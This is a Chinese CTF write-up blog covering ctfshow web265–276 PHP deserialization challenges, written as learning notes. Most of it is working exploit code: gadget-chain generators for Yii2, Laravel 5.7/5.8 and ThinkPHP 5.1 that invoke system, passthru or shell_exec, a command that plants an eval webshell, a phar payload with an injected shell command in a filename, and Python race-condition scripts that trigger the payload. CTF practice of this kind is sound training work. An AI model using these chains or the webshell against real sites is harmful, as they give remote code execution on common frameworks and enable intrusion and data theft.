O:12:"ctfshowAdmin":2:{s:5:"token";N;s:8:"password";R:2;}

解释:token的值第一次调用该类 password的值R:2代表该值第二次调用该类

我好像明白怎么解释了 这里ctfshowAdmin是第一个位置 token是第二个位置 R代表引用 R:2代表引用第二个位置 哈哈哈 这是正确解释

最好不要直接手写poc 很容易出错

解释的不容易理解,就是他俩变量指向同一个位置 也就相当于他俩恒等于

exp

php 复制代码
<?php
class ctfshowAdmin{
    public $token;
    public $password;
    public function __construct(){
        $this->token;
        $this->password =&$this->token;
}
}
$a=new ctfshowAdmin();
echo serialize($a);

web266

源码

php 复制代码
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-04 23:52:24
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-05 00:17:08
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
highlight_file(__FILE__);
include('flag.php');
$cs = file_get_contents('php://input');
class ctfshow{
    public $username='xxxxxx';
    public $password='xxxxxx';
    public function __construct($u,$p){
        $this->username=$u;
        $this->password=$p;
    }
    public function login(){
        return $this->username===$this->password;
    }
    public function __toString(){
        return $this->username;
    }
    public function __destruct(){
        global $flag;
        echo $flag;
    }
}
$ctfshowo=@unserialize($cs);
if(preg_match('/ctfshow/', $cs)){
    throw new Exception("Error $ctfshowo",1);
}

$cs = file_get_contents('php://input'); 获取post提交的数据

直接大小写绕过

大小写确实能绕过 还有一种方法:扰乱属性将2改成3 甚至只要保证O:7:"ctfshow":2存在剩下的瞎写乱写都行 叫什么破坏反序列化的结构 但是不破坏类名 说实话不理解

destruct会在脚本结束后销毁,而抛出异常导致无法立即执行destruct,所以我们要进行快速析构

原理:当php接收到畸形序列化字符串时,PHP由于其容错机制,依然可以反序列化成功。但是,由于你给的是一个畸形的序列化字符串,总之他是不标准的,所以PHP对这个畸形序列化字符串得到的对象不放心,于是PHP就要赶紧把它清理掉,那么就触发了他的析构方法。

我其实差不多也明白了:必须整个代码结束才能进行魔术方法

会抛出一个异常。当异常被抛出后,程序会立即停止当前的执行流程,并将控制权转交给最近的异常处理程序。在异常处理过程中,系统会清理资源和执行相应的异常处理代码。

这就意味着,如果反序列化成功并触发了__destruct()方法,但在之后的代码中抛出了异常,那么异常会先被捕获处理,而不会继续执行__destruct()方法中的剩余部分,包括输出$flag的值。

差不多对的大白话:按理说是调用了魔术方法 但是还没有执行完就因为报错而停止程序执行。

web267

页面用的什么框架不知道 看源码看一下

框架就是一种软件工具,它提供了一些基础功能和规范,可以帮助开发者更快地构建应用程序。比如Yii框架和ThinkPHP框架就是两个流行的PHP框架,它们提供了很多现成的功能和工具,让开发者可以更轻松地编写代码,不需要从零开始。使用框架可以加快开发速度、提高代码质量,并且有助于维护和扩展应用程序。

查看源码发现有个yii.js的脚本文件。

yii.js是一个与Yii框架相关的JavaScript文件。Yii是一个流行的PHP框架,它提供了一些功能和工具,用于简化Web应用程序的开发过程。如果你在使用Yii框架构建网站或应用程序,那么引用这个脚本文件可能是为了使用Yii框架提供的一些客户端功能或特性。判断出该网页使用的是yii框架

点进去发现是2.0的版本

网上也流传了反序列化链

Yii2 2.0.38 之前的版本存在反序列化漏洞,程序在调用unserialize 时,攻击者可通过构造特定的恶意请求执行任意命令。CVE编号是CVE-2020-15148。

现在找一下入口,由于是反序列化利用链,我们需要一个入口点

弱口令登陆一下 看一下 发现about页面有一点变化 查看源码 给了个提示

给的是? 我以为是在首页面位置使用呢 原来就是在adout页面用&连接

因为就是这个页面给的提示 按理说就是应该在这个页面的url后加入该参数

发现一个反序列化入口点:,给了入口 和需要提交的参数名

访问一下 结果是空白 证明是有这个页面的,光访问不行还得传个值否则访问不到 所以他才给提示

通用的链子

exp

php 复制代码
<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'passthru';
            $this->id = 'tac /flag';
        }
    }
}
namespace Faker{
    use yii\rest\CreateAction;
    class Generator{
        protected $formatters;
        public function __construct(){
            $this->formatters['close'] = [new CreateAction(), 'run'];
        }
    }
}
namespace yii\db{
    use Faker\Generator;
    class BatchQueryResult{
        private $_dataReader;
 
        public function __construct(){
            $this->_dataReader = new Generator;
        }
    }
}
namespace{
    echo base64_encode(serialize(new yii\db\BatchQueryResult));
}

passthru也是远程命令执行的函数 这个方便

大师傅就凭着感觉走 切合实际

checkAess='shell_exec'

id="echo '<?php eval(\$_POST[1]);phpinfo();?>' > /var/www/html/basic/web/1.php";

注意看大师傅的视频特别是这个讲解 从头到位出问题 就得多尝试

有几点我说一下 命令多换换 单引号双引号多换换 还有转移

真的是学的越多越好 查询该页面位置pwd的时候 使用了DNS外带 标记一下有时间学DNS外带

大师傅如何确定的当前路径

在DNSLOG里面先复制地址 用的大佬的图

写shell

访问成功后

找到flag位置

web268

用267的方式试一遍 不行 可能被过滤了 把eval shell等字符串使用点进行拼接

发现还是不行 那就只能是一个原因了 这个链子被过滤了 这个链子用不来了了

现成链子

exp

php 复制代码
<?php
namespace yii\rest {
    class Action
    {
        public $checkAccess;
    }
    class IndexAction
    {
        public function __construct($func, $param)
        {
            $this->checkAccess = $func;
            $this->id = $param;
        }
    }
}
namespace yii\web {
    abstract class MultiFieldSession
    {
        public $writeCallback;
    }
    class DbSession extends MultiFieldSession
    {
        public function __construct($func, $param)
        {
            $this->writeCallback = [new \yii\rest\IndexAction($func, $param), "run"];
        }
    }
}
namespace yii\db {
    use yii\base\BaseObject;
    class BatchQueryResult
    {
        private $_dataReader;
        public function __construct($func, $param)
        {
            $this->_dataReader = new \yii\web\DbSession($func, $param);
        }
    }
}
namespace {
    $exp = new \yii\db\BatchQueryResult('shell_exec', 'cp /f* 1.txt'); //此处写命令
    echo(base64_encode(serialize($exp)));
}

直接访问1.txt

在这里说一下大师傅说以后遇见这种yii框架的漏洞 找到入口把知道的链子都试一下

web269

还是一样的使用web268链子 发现成功拿下flag

web270

还用web268链子 成功拿下

总结

这几道yii框架的反序列化漏洞 虽然没让我学会原理 但是我学会了 如果遇见某一类框架漏洞 直接找入口 找到入口后 网上找现成的链子 一个一个去尝试,现在我的时间不多了只能按照教程这么思路的来一遍这种框架漏洞 具体原理目前没时间学 如果以后有时间搜索(YII链子学习反序列化) 2023/12/7 14:38图书馆

记录一下链子

poc1

php 复制代码
<?php

namespace yii\rest{
    class IndexAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'phpinfo';
            $this->id = '1';				//命令执行
        }
    }
}
namespace Faker {

    use yii\rest\IndexAction;

    class Generator
    {
        protected $formatters;

        public function __construct()
        {
            $this->formatters['close'] = [new IndexAction(), 'run'];
        }
    }
}
namespace yii\db{

    use Faker\Generator;

    class BatchQueryResult{
        private $_dataReader;
        public function __construct()
        {
            $this->_dataReader=new Generator();
        }
    }
}
namespace{

    use yii\db\BatchQueryResult;

    echo base64_encode(serialize(new BatchQueryResult()));
}

poc2

yii2.2.37

php 复制代码
<?php

namespace yii\rest{
    class IndexAction{
        public $checkAccess;
        public $id;
        public function __construct(){
            $this->checkAccess = 'system';
            $this->id = 'whoami';
        }
    }
}
namespace yii\db{

    use yii\web\DbSession;

    class BatchQueryResult
    {
        private $_dataReader;
        public function __construct(){
            $this->_dataReader=new DbSession();
        }
    }
}
namespace yii\web{

    use yii\rest\IndexAction;

    class DbSession
    {
        public $writeCallback;
        public function __construct(){
            $a=new IndexAction();
            $this->writeCallback=[$a,'run'];
        }
    }
}

namespace{

    use yii\db\BatchQueryResult;

    echo base64_encode(serialize(new BatchQueryResult()));
}

poc3

2.0.38

php 复制代码
<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            $this->checkAccess = 'system';
            $this->id = 'ls';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){
            // 这里需要改为isRunning
            $this->formatters['isRunning'] = [new CreateAction(), 'run'];
        }
    }
}

// poc2
namespace Codeception\Extension{
    use Faker\Generator;
    class RunProcess{
        private $processes;
        public function __construct()
        {
            $this->processes = [new Generator()];
        }
    }
}
namespace{
    // 生成poc
    echo base64_encode(serialize(new Codeception\Extension\RunProcess()));
}
?>

poc4

2.0.38

php 复制代码
<?php
namespace yii\rest{
    class CreateAction{
        public $checkAccess;
        public $id;

        public function __construct(){
            $this->checkAccess = 'system';
            $this->id = 'dir';
        }
    }
}

namespace Faker{
    use yii\rest\CreateAction;

    class Generator{
        protected $formatters;

        public function __construct(){
            // 这里需要改为isRunning
            $this->formatters['render'] = [new CreateAction(), 'run'];
        }
    }
}

namespace phpDocumentor\Reflection\DocBlock\Tags{

    use Faker\Generator;

    class See{
        protected $description;
        public function __construct()
        {
            $this->description = new Generator();
        }
    }
}
namespace{
    use phpDocumentor\Reflection\DocBlock\Tags\See;
    class Swift_KeyCache_DiskKeyCache{
        private $keys = [];
        private $path;
        public function __construct()
        {
            $this->path = new See;
            $this->keys = array(
                "axin"=>array("is"=>"handsome")
            );
        }
    }
    // 生成poc
    echo base64_encode(serialize(new Swift_KeyCache_DiskKeyCache()));
}
?>

poc5

2.0.42

php 复制代码
<?php

namespace Faker;
class DefaultGenerator{
    protected $default ;
    function __construct($argv)
    {
        $this->default = $argv;
    }
}

class ValidGenerator{
    protected $generator;
    protected $validator;
    protected $maxRetries;
    function __construct($command,$argv)
    {
        $this->generator = new DefaultGenerator($argv);
        $this->validator = $command;
        $this->maxRetries = 99999999;
    }
}

namespace Codeception\Extension;
use Faker\ValidGenerator;
class RunProcess{
    private $processes = [];
    function __construct($command,$argv)
    {
        $this->processes[] = new ValidGenerator($command,$argv);
    }
}

$exp = new RunProcess('system','whoami');
echo(base64_encode(serialize($exp)));

poc6
为什么不用分析具体为什么能成功 ,后面会有几个专题 会对php框架进行更深入的了解 这里面会专门的研究 为什么能够实现RCE

前面作为初步的熟悉 首先知道一下他的框架 知道框架的风格 知道啥版本可以用什么来打

首先先不用太研究 这样的话 自己会感觉会难 所以以后再说 随着积累刚开始不理解的地方做的多了就豁然开朗

就像收集的框架确定有用后 可以保留 以后没准遇得到

web271

laravel5.7反序列化漏洞

使用网上公布的反序列化的链子

源代码

php 复制代码
<?php

/**
 * Laravel - A PHP Framework For Web Artisans
 *
 * @package  Laravel
 * @author   Taylor Otwell <taylor@laravel.com>
 */

define('LARAVEL_START', microtime(true));

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader for
| our application. We just need to utilize it! We'll simply require it
| into the script here so that we don't have to worry about manual
| loading any of our classes later on. It feels great to relax.
|
*/

require __DIR__ . '/../vendor/autoload.php';

/*
|--------------------------------------------------------------------------
| Turn On The Lights
|--------------------------------------------------------------------------
|
| We need to illuminate PHP development, so let us turn on the lights.
| This bootstraps the framework and gets it ready for use, then it
| will load up this application so that we can run it and send
| the responses back to the browser and delight our users.
|
*/

$app = require_once __DIR__ . '/../bootstrap/app.php';

/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request
| through the kernel, and send the associated response back to
| the client's browser allowing them to enjoy the creative
| and wonderful application we have prepared for them.
|
*/

$kernel = $app->make(Illuminate\Contracts\Http\Kernel::class);
$response = $kernel->handle(
    $request = Illuminate\Http\Request::capture()
);
@unserialize($_POST['data']);
highlight_file(__FILE__);

$kernel->terminate($request, $response);

exp

php 复制代码
<?php
//gadgets.php
namespace Illuminate\Foundation\Testing{
	class PendingCommand{
		protected $command;
		protected $parameters;
		protected $app;
		public $test;
		public function __construct($command, $parameters,$class,$app)
	    {
	        $this->command = $command;
	        $this->parameters = $parameters;
	        $this->test=$class;
	        $this->app=$app;
	    }
	}
}
namespace Illuminate\Auth{
	class GenericUser{
		protected $attributes;
		public function __construct(array $attributes){
	        $this->attributes = $attributes;
	    }
	}
}
namespace Illuminate\Foundation{
	class Application{
		protected $hasBeenBootstrapped = false;
		protected $bindings;
		public function __construct($bind){
			$this->bindings=$bind;
		}
	}
}
namespace{
	echo urlencode(serialize(new Illuminate\Foundation\Testing\PendingCommand("system",array('ls /'),new Illuminate\Auth\GenericUser(array("expectedOutput"=>array("0"=>"1"),"expectedQuestions"=>array("0"=>"1"))),new Illuminate\Foundation\Application(array("Illuminate\Contracts\Console\Kernel"=>array("concrete"=>"Illuminate\Foundation\Application"))))));
}
?>

不知道为什么么找了好多链子 这个和大师傅的链子一摸一样 但是都有一个通用的问题 一旦命令中出现空格 就不好使,自己找出来解决方式了 使用IFS代表空格 `IFS$9` 是为了绕过命令中的空格 加不加$9都可以 他俩的意思应该都是空格 反正能代替空格

发现了flag

查看flag内容

web272-273

laravel5.8反序列化漏洞

源码

php 复制代码
<?php

/**
 * Laravel - A PHP Framework For Web Artisans
 *
 * @package  Laravel
 * @author   Taylor Otwell <taylor@laravel.com>
 */

define('LARAVEL_START', microtime(true));

/*
|--------------------------------------------------------------------------
| Register The Auto Loader
|--------------------------------------------------------------------------
|
| Composer provides a convenient, automatically generated class loader for
| our application. We just need to utilize it! We'll simply require it
| into the script here so that we don't have to worry about manual
| loading any of our classes later on. It feels great to relax.
|
*/

require __DIR__ . '/../vendor/autoload.php';

/*
|--------------------------------------------------------------------------
| Turn On The Lights
|--------------------------------------------------------------------------
|
| We need to illuminate PHP development, so let us turn on the lights.
| This bootstraps the framework and gets it ready for use, then it
| will load up this application so that we can run it and send
| the responses back to the browser and delight our users.
|
*/

$app = require_once __DIR__ . '/../bootstrap/app.php';

/*
|--------------------------------------------------------------------------
| Run The Application
|--------------------------------------------------------------------------
|
| Once we have the application, we can handle the incoming request
| through the kernel, and send the associated response back to
| the client's browser allowing them to enjoy the creative
| and wonderful application we have prepared for them.
|
*/

$kernel = $app->make(Illuminate\Contracts\Http\Kernel::class);
$response = $kernel->handle(
    $request = Illuminate\Http\Request::capture()
);
@unserialize($_POST['data']);
highlight_file(__FILE__);

$kernel->terminate($request, $response);

看看之前的poc可不可以 不行,新找一个

exp

php 复制代码
<?php

namespace Illuminate\Broadcasting{
    class PendingBroadcast
    {
        protected $events;
        protected $event;

        public function __construct($events="",$event="")
        {
            $this->events = $events;
            $this->event = $event;
        }
    }
}

namespace Illuminate\Bus{
    class Dispatcher
    {
        protected $queueResolver = "system";
    }
}

namespace Illuminate\Broadcasting{
    class BroadcastEvent
    {
        public $connection = 'tac$IFS/f*';
    }
}

namespace{
    $d = new Illuminate\Bus\Dispatcher();
    $b = new Illuminate\Broadcasting\BroadcastEvent();
    $p = new Illuminate\Broadcasting\PendingBroadcast($d,$b);
    echo urlencode(serialize($p));
}

?>

查看根目录文件

查看flag

成功

大师傅的链子我没找到 找到一个基本差不多的 但是我的不好使 他直接传cookie 将结果传进了cookie中

然后的到路径后 写木马到1.php

web273用272的链子就行 老师的这个我是真喜欢 但是我的不好使

web274

thinkphp框架

5.1也有几个链子

现在就是找反序列化入口

查看源码发现提示 GET方式传入data参数

网上找一个thinkphp5.1的链子

exp

php 复制代码
<?php
namespace think;
abstract class Model{
    protected $append = [];
    private $data = [];
    function __construct(){
        $this->append = ["lin"=>["calc.exe","calc"]];
        $this->data = ["lin"=>new Request()];
    }
}
class Request
{
    protected $hook = [];
    protected $filter = "system";
    protected $config = [
        // 表单ajax伪装变量
        'var_ajax'         => '_ajax',  
    ];
    function __construct(){
        $this->filter = "system";
        $this->config = ["var_ajax"=>'lin'];
        $this->hook = ["visible"=>[$this,"isAjax"]];
    }
}
namespace think\process\pipes;
use think\model\concern\Conversion;
use think\model\Pivot;
class Windows
{
    private $files = [];

    public function __construct()
    {
        $this->files=[new Pivot()];
    }
}
namespace think\model;
use think\Model;
class Pivot extends Model
{
}
use think\process\pipes\Windows;
echo base64_encode(serialize(new Windows()));
?>

通过lin进行传参

成功获取flag

web275

代码

php 复制代码
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-08 19:13:36
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-08 20:08:07
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
highlight_file(__FILE__);
class filter{
    public $filename; //定义三个属性
    public $filecontent;
    public $evilfile=false;
    public function __construct($f,$fn){//将传进来的两个参数赋值给属性
        $this->filename=$f;
        $this->filecontent=$fn;
    }
    public function checkevil(){
        if(preg_match('/php|\.\./i', $this->filename)){//在filename如果匹配了php 那就给evilfile赋值为真
            $this->evilfile=true;
        }
        if(preg_match('/flag/i', $this->filecontent)){//在filecontent如果匹配flag 那就给evilfile赋值为真
            $this->evilfile=true;
        }
        return $this->evilfile;//返回evilfile
    }
    public function __destruct(){//反序列化的时候 如果evilfile为真
        if($this->evilfile){ //执行系统命令rm $filename
            system('rm '.$this->filename);
        }
    }
}
if(isset($_GET['fn'])){//传入fn
    $content = file_get_contents('php://input');//获取通过 HTTP POST 请求发送的原始数据。
    $f = new filter($_GET['fn'],$content);//传入两个参数 第一个参数get获取到的 第二个参数post获取到的  会先触发construct后触发destruct
    if($f->checkevil()===false){//如果evilfile为假
        file_put_contents($_GET['fn'], $content);//写文件 将POST值写入GET的值的文件中
        copy($_GET['fn'],md5(mt_rand()).'.txt');//将从 GET 请求中获取的文件复制到一个以随机生成的 MD5 哈希作为文件名的新文件中。
        unlink($_SERVER['DOCUMENT_ROOT'].'/'.$_GET['fn']);//删除GET的文件 前面代表网站根目录
        echo 'work done';
    }
}else{
    echo 'where is flag?';
}
where is flag?
//

看的差不多足够我们RCE(远程代码执行)了

很简单

查看flag

可以看到都不需要干别的就能rce了

web276

(这道题我感觉我比百度搜的都细 这道题他们都不写)

源码

php 复制代码
<?php

/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date:   2020-12-08 19:13:36
# @Last Modified by:   h1xa
# @Last Modified time: 2020-12-08 20:08:07
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
mytime 2023/12/7 23:20
*/
highlight_file(__FILE__);
class filter{
    public $filename;
    public $filecontent;
    public $evilfile=false;
    public $admin = false;

    public function __construct($f,$fn){
        $this->filename=$f;
        $this->filecontent=$fn;
    }
    public function checkevil(){
        if(preg_match('/php|\.\./i', $this->filename)){
            $this->evilfile=true;
        }
        if(preg_match('/flag/i', $this->filecontent)){
            $this->evilfile=true;
        }
        return $this->evilfile;
    }
    public function __destruct(){
        if($this->evilfile && $this->admin){//必须保证evilfile和admin都为真 才可以
            system('rm '.$this->filename);
        }
    }
}

if(isset($_GET['fn'])){
    $content = file_get_contents('php://input');
    $f = new filter($_GET['fn'],$content);
    if($f->checkevil()===false){
        file_put_contents($_GET['fn'], $content);
        copy($_GET['fn'],md5(mt_rand()).'.txt');
        unlink($_SERVER['DOCUMENT_ROOT'].'/'.$_GET['fn']);//删除文件 在删除见我们要使用phar://进行解析该文件使得phar文件内容进行反序列化
        echo 'work done';
    }
    
}else{
    echo 'where is flag?';
}

<?php file_put_contents("new_file.txt", "Hello, World!"); ?>

需要先写入phar包,然后条件竞争在其被删除前通过 phar:// 使其反序列化来命令执行

phar包通过 phar:// 解析获取处理时会反序列化

先生成一个我们所需的phar包(使用php生成phar模板按照我们所需要求修改的)

生成phar包

php 复制代码
<?php
highlight_file(__FILE__);
class filter{
    public $filename="1;tac f*";
    public $filecontent;
    public $evilfile=true;
    public $admin = true;
}
$a=new filter();
@unlink('phar.phar');   //删除之前的test.par文件(如果有)
$phar=new Phar('phar.phar');  //创建一个phar对象,文件名必须以phar为后缀
$phar->startBuffering();  //开始写文件
$phar->setStub('<?php __HALT_COMPILER(); ?>');  //写入stub
$phar->setMetadata($a);//写入meta-data 这里进行序列化
$phar->addFromString("phar.txt","phar");  //添加要压缩的文件
$phar->stopBuffering();

用python写一个脚本 持续提交phar和获取phar内容 开启条件竞争 (这个脚本按照大师傅 自己写的 真爽 写的代码量巨少 功能巨强)

python脚本

php 复制代码
import requests
import threading
url = 'http://8f28ec2c-f5c0-445d-b3a3-ac9ebe60556c.challenge.ctf.show/'
data = open('./phar.phar', 'rb').read()
flag = True
def write(): # 写入phar.phar
    requests.post(url+'?fn=phar.phar', data=data)#post方法提交数据 数据就是从本地phar文件中获取的二进制数据(图像视频什么的必须使用二进制方式读取否则乱码)
def unserialize(): # 触发反序列化
    global flag  #在函数内部声明一个全局变量 函数内部修改变量 必须使用global
    r = requests.get(url+'?fn=phar://phar.phar')#发送get请求 以phar方式进行读取我们传入的phar文件 在没删除之前快速读取
    #请求如果获取到内容了保存在r变量中
    if 'ctfshow{' in r.text and flag:#在内容中如果存在ctfshow字样
        print(r.text)
        flag = False
while flag: # 线程条件竞争,直到读到flag
    threading.Thread(target = write).start() #开启一个线程 循环执行线程里面的函数
    threading.Thread(target = unserialize).start() #同理 直到输出了r.text flag为假 才会停止执行

执行python代码 成功获取到flag

因为我是小白嘛 什么都不是很理解 这道题我发现了python脚本的好处 直呼神奇

说是条件竞争 我又想到了一种 但是没有成功不知道什么原因 就是再没删除前写入一句话木马到一个文件内 ,最后访问这个文件 可惜没有成功 但是是个思路记录一下吧

php 复制代码
import requests
import threading
import time
url = 'http://64ebefe9-27f9-48a2-bf08-06f23b3f36f0.challenge.ctf.show/'
data = "<?php file_put_contents('tzy.php','<?php phpinfo();?>', FILE_APPEND); ?>"
flag = True
def post():
    requests.post(url+'?fn=1.PHP', data=data)
def get1():
    requests.get(url + '1.php')
def get2():
    r = requests.get(url+'tzy.php')
    if 'PHP Version' in r.text:
        global flag
        flag = False
while flag:
    threading.Thread(target=get1).start()
    threading.Thread(target=get2).start()
    threading.Thread(target=post).start()
相关推荐
星竹38 分钟前
upload-labs-master第21关超详细教程
网络安全
蜜獾云40 分钟前
docker 安装雷池WAF防火墙 守护Web服务器
linux·运维·服务器·网络·网络安全·docker·容器
独行soc12 小时前
#渗透测试#漏洞挖掘#红蓝攻防#护网#sql注入介绍08-基于时间延迟的SQL注入(Time-Based SQL Injection)
数据库·sql·安全·渗透测试·漏洞挖掘
Clockwiseee13 小时前
php伪协议
windows·安全·web安全·网络安全
Lspecialnx_17 小时前
文件解析漏洞中间件(iis和Apache)
网络安全·中间件
学习溢出19 小时前
【网络安全】逆向工程 练习示例
网络·安全·网络安全·渗透测试·逆向工程
孤独的履行者21 小时前
入门靶机:DC-1的渗透测试
数据库·python·网络安全
Blankspace学1 天前
Wireshark软件下载安装及基础
网络·学习·测试工具·网络安全·wireshark
CVE-柠檬i1 天前
Yakit靶场-高级前端加解密与验签实战-全关卡通关教程
网络安全